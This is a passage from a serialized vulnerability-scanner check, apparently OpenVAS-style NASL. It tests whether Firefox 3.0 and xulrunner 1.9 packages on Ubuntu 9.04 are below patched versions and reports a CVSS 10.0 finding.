ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-branding\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}